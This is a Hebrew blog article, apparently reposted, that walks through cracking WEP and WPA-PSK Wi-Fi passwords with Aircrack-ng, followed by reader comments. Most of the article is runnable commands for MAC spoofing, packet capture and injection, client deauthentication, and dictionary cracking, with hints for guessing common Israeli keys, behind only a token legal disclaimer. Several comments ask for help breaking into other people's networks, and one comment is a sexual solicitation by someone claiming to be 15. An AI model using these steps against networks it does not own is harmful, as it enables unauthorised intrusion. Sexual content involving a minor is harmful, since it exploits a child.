מדריך: איך פורצים לרשת אלחוטית?

תמיד שמעתם שפורצים לרשתות אלחוטיות? גיא מזרחי מסביר לנו מה ההבדלים בין WEP ל-WPA-PSK וכמה זה קל לעשות את זה עם כל מחשב פשוט.

wirelessHackingחשוב לציין לפני שמתחילים, שפריצה לרשתות אלחוטיות ללא הסכמה של בעל הרשת היא אינה חוקית ומהווה עבירה פלילית ולכן כל המידע הנמצא במדריך זה נכתב למטרות למידה בלבד.

על-מנת לבצע את תהליך הפריצה המתואר במדריך זה, יש צורך במערכת הפעלה מבוססת לינוקס, תוכנת Aircrack-NG ובכרטיס רשת אלחוטי אשר תומך בפונקצית Packet Injection. שני יצרניות מוכרות המייצרות כרטיסי רשת התומכים בתכונה המבוקשת הם Atheros ו-Realtek. אני משתמש בכרטיס RT8187 של Realtek והוא יודע לבצע את כל הפעולות הנדרשות בצורה טובה. העלות של כרטיס RT8187 היא פחות מ-30 דולר ב-Deal Extreme, אך אם אתם מעוניינים בכרטיס איכותי יותר מומלץ ללכת על כרטיס של ALFA בעלות של 40-50 דולר ב-ebay.

תהליך הפריצה של רשת אלחוטית מורכב קודם כל מגילוי סיסמת ההתחברות. גילוי הסיסמא יכול להיות מורכב יותר או פחות, תלוי בעיקר בשיטת ההצפנה שבה בחר בעל הרשת. שיטת ההצפנה הפשוטה ביותר לפיצוח היא WEP מאחר וזאת כוללת גרסה מוצפנת של מפתח ההצפנה (הסיסמא) בכל Packet שעובר ברשת.

השלב הראשון בפיצוח סיסמת הרשת האלחוטית המיועדת הוא החלפת כתובת ה-MAC של כרטיס הרשת שלכם. את ההחלפה ניתן לעשות באמצעות סט הפקודות הבא:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0

השלב הבא יהיה האזנה לתעבורת הרשת של הרשת המיועדת והקלטתה לתוך קובץ שמור.

airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

לאחר שההקלטה מכילה תעבורה מספיקה לצורך פיצוח הסיסמא, נריץ תוכנה המאפשרת את חשיפת הסיסמא על-פי התנועה

aircrack-ng -b (bssid) file name-01.cap

רשת מסוג WPA היא קצת יותר מורכבת ל"פריצה" מאחר והיא מעבירה את מפתח ההפצנה שלה רק ביצירת החיבור הראשוני בין ה-Client לנקודת הגישה האלחוטית. לכן , הדרך שלי לפצח את הסיסמה מתבססת על האזנה לתעבורה ביחד עם מילון סיסמאות מוכן

airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 –channel (channel) –bssid (bssid) -w /tmp/wpa
aireplay-ng -0 1 -a (same-bssid) -c (mac) mon0
aircrack-ng -w wordlist.txt -b bssid /tmp/wpa*.cap

כמו שאתם מבינים, אנחנו צריכים מילון מוכן שיכיל בתוכו את המפתח. חלק גדול מהמשתמשים בישראל משתמשים במפתח שמורכב ממספר הטלפון או הסלולרי שלהם ולכן מילון שמכיל את כל האפשרויות של הספרות עד 10 תווים ייתן תוצאה לא רעה, אבל לא חסרים מילונים נוספים ברשת שיכולים לענות על הצורך. למילון ארוך יותר ניתן להשתמש ב-JOHN:

/pentest/passwords/jtr/john –stdout –incremental:all > wordlist.txt

שימו לב לעצור אותו כשהוא מגיע ל-10 תווים או כמה שרציתם להגיע. מילון טוב (10 תווים של כל ה-ASCII) יכול להגיע למעל 200GB ככה שתדאגו שיש לכם מספיק מקום בשבילו.

הפוסט במקור בבלוג Zull, יומנו של האקר

גיא מזרחי

מומחה לאבטחת מידע והבעלים של הבלוג "יומו של האקר". http://www.hacking.org.il

תגיות לכתבה:

להגיב

25 תגובות

  1. מאת ארז:

    script kiddie.

  2. ארז יקירי,
    אני מניח שאתה יכול לתפוס פקטות באויר עם הידיים, להזריק פקטות עם הלשון ולפרוץ את המפתח בכוח המוח בלבד.

    בנושא הזה אני מוגבל.
    חייב להשתמש בכלים שרוב רובם של ההאקרים בעולם משתמשים בהם.
    כנראה שכולנו סקידיז.

  3. מאת דב:

    האם זה אומר ששימוש ב-WPA עם מפתח בצרוף של אותיות וספרות של מעל 10 תווים הופך אותו לכמעט בלתי פריץ (כל זמן שאף אחד לא חושב שמאוחסנות שם הסיסמאות של בנק ישראל) ?

  4. דב:
    לא הייתי מגדיר את זה בלתי פריץ אלא קשה יותר לפריצה.
    יש אפשרות היום לפרוץ את המפתח עם שירותים חיצוניים (בתשלום) כגון http://wpacracker.com שמשתמש בכוח מחשוב גדול יותר ולקבל את הסיסמאות בצורה מהירה גם אם הסיסמאות ארוכות מ-10 תווים.
    בהתחשב בכך הייתי עונה שלא.
    WPA לא מספק הגנה מושלמת אבל כן מספק הגנה טובה יחסית לבית שאין להאקר מוטיבציה או סיבה לחפש אותו.
    בכל מקרה אם ניתן, הייתי עובר לעבוד עם WPA2.

  5. מאת דן:

    תנו לי להסביר בצורה קצת יותר טובה את המצב:
    שיטת האבטחה WEP היא שיטה בעייתית מאוד. הבעיה העיקרית עם WEP נמצאת במנגנון ההצפנה שלה – שהוא חלש מאוד וכבר נפרץ בכמה שיטות יצירתיות שונות. התוצאה היא שבהינתן גישה למספיק תעבורה מוצפנת מהרשת (כרטיס רשת מתאים + Wireshark יעשו את העבודה), אפשר להוציא את הסיסמה בזמן סביר על כל מחשב מודרני.
    כעיקרון היה ברור די מהר שהאבטחה של WEP לא מספיק טובה, והחל גיבוש של סטנדרט אבטחה חדש לרשתות אלחוטיות בשם 802.11i. העניין הוא שבעקבות כל הדרכים לפריצת WEP שפורסמו שהפכו את WEP לבלתי-אפקטיבי לחלוטין כנגד התקפות מכוונות, הבינו שחייבים לשחרר משהו מהר ואין זמן לחכות עד שתקן 802.11i יתגבש לחלוטין. התוצאה של זה היא WPA, שיטת אבטחה חדשה שאמנם משתמשת באותה שיטת הצפנה כמו WEP (שתיהן משתמשות ב-RC4), אבל משנה את כל מה שמסביב כדי לסתום את כל הפרצות הידועות שאפשרו את הפריצה של WEP בזמן כל-כך קצר (כגון הסתרה של ה-IV, אבטחה נגד "הזרקת פקטות" והחלפה של המפתח כל זמן קצר).
    בניגוד ל-WEP, שבו היה ניתן לפרוץ את הרשת ע"י תקיפת מנגנון האבטחה עצמו, במקרה של WPA אין הרבה ברירות אלא פשוט "לנסות סיסמאות" – וכמעט כל השירותים לפריצת WPA פשוט מחזיקים מילון של סיסמאות נפוצות ובודקים אותן. זה הופך את אבטחת הרשת להיות חזקה כמו הסיסמה שמגנה אליה. תשימו מילה מהמילון – סיכוי טוב שאם מישהו ירצה לפרוץ לכם, הוא גם יצליח. שימו סיסמה לא קצרה (רצוי יותר מ-10 תווים) שמורכבת מתווים אקראיים (רצוי לא רק אלפא-נומריים) והסיכוי שמישהו (שהוא לא ה-NSA) יצליח לפרוץ לכם לרשת שואף לאפס.
    אגב, אחרי WPA יצא גם WPA2, שמממש את 802.11i המלא ומאפשר שימוש בהצפנה שונה לגמרי (AES) ונחשב עוד יותר בטוח מ-WPA. החסרון הוא שהוא לא נתמך ע"י חומרה ממש ישנה. אם כל החומרה שלכם תומכת ב-WPA2 רצוי להשתמש בשיטה הזאת. עם זאת, יצויין שגם היא ניתנת לפריצה עם משתמשים בסיסמה קלה לניחוש.

  6. מה שהוא אומר זה למעשה שככל שהמפתח מורכב מיותר תוים שונים ואורך יותר כך זמן הפריצה יהיה ארוך יותר , מעל אורך מסוים זה כבר יהיה מאד מאד ארוך וכמעט לא כדאי לפריצה.
    מתמטית – מספר הקומבינציות הוא מספר תוי הבסיס בחזקת אורך המפתח לכן :
    אורך בסיס של אותית מספרים ותוים מגדיל מאד את כמות הקומבינציות האפשריות.
    ססמא שמורכבת ממספרים בלבד היא חלשה , אותיות ומספרים בינונית , אותיות מספרים ותוים מעל 10 תוים נחשבת לחזקה .. יש הרבה אתרים שמחשבים את זה ..
    http://www.passwordmeter.com/

  7. מאת mony:

    איפה אני רושם את כול הדברים האלה?
    ?
    ?
    ?
    ?
    ?
    ?
    ?
    ?
    ?
    ?

  8. מאת יוסי:

    איך אני משיג מילון? לפריצת WPA אני מרגיש צורך להתקדם אחרי היגע והיזע בפריצת הWEP אגב, הערה לגבי הפריצה,
    בפקודה AIRODUMP כשהוא מחפ רשתות בסביבה יש לבחון תחת העמודה DATA אם יש התקדמות, במקרה ואין, לא ניתן לפרוץ או ניתן, אחרי שנה…..

  9. מאת משה יפרח:

    איפה אני עושה את סט הפקודות אין לי מוסג באקרות אבל אני צריך דחוף את הפריצה הזאת אני בפנימיה והיחידי שיש לו אינטרנט אלחוטי הוא המדריך שלי שגר מאחורי הפנימיה שלי אני קולט אותו אבל יש לו סיסמה של WAB אז יש מצב אתם עוזרים לי בבקשה ??

  10. מאת melniXofia:

    חחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחחח
    יש מצב שאם אני אצליח לפרוץ ולהתחבר לרשת המאובטחת…..הבעלים ידעו מזה בכלל??
    O_ם זה משמעכב אותי להשתמש בכלים-אז יש לכם מושג?

  11. מאת בת-אל:

    אצלי בבית יש רשת אלחוטית. ישנם 4 מחשבים. אחד נייח ו3 ניידים.
    אחי חסם את הגישה של מחשב הנייד שלי לאינטרנט.

    מה לעשות?

  12. מאת בת-אל:

    מישהו בבקשה מוכן לעזור לי פה?!

  13. מאת חי:

    אני אעזור לך בתאל

  14. מאת משתמש אנונימי (לא מזוהה):

    me parece que el programa tiene defectos de software malicioso cabrones,…

  15. מאת ישראל:

    יש לי tp-link איך זה טוב

  16. מאת ישראל:

    יש לי tp-link איך זה טוב

  17. מאת איברהים בה:

    אם אני פורץ WPA של בית זונות, מה שנקרא. בורדל. זה אומר.. שזו אינה עבירה על שום חוק? הלא כך? הפורץ לפרוצה פטור, אם זה נכון, אני אתחיל לפרוץ.

  18. מאת שמעון:

    מאיפה אני משיג את המילון הזה של הסיסמאות המוכנות

  19. מאת יוסי:

    לינוקס יכולה לעבוד גם אם ווינדוס שאלה

  20. מאת ליאן:

    אוקיי שמתי סיסמא על הראוטר שלי שהוא Dlink 2760u ואני רוצה להתחבר מהאייפון לרשת של הבית אבל שחכתי את הסיסמא של הרשת שלי ואת השם משתמש, התקשרתי לבזק והם אמרו לי שהם לא יכולים לעזור מפניי שאני מנוי באלחוטי אני לא מבינה כ"כ במחשבים את יכולים לעזור לי בבקשה :(

  21. מאת חסויה אבל כוסית בלונדה:

    לא הבנתי איך

  22. מאת חסויה אבל כוסית בלונדה וגם עושה כסף בצד:

    הי חברים בימקום ליפרוץ בואו אלי 70 שח לשעה אני רזה בלונדינית עניים תחלת חלש גובה מטר 70 בת 15 רק עים קונדום בילבד

הרשם לאתר

רק גיקים יכולים ליצור דיון חדש! כדי להפוך לגיק מדופלם, הרשם לאתר.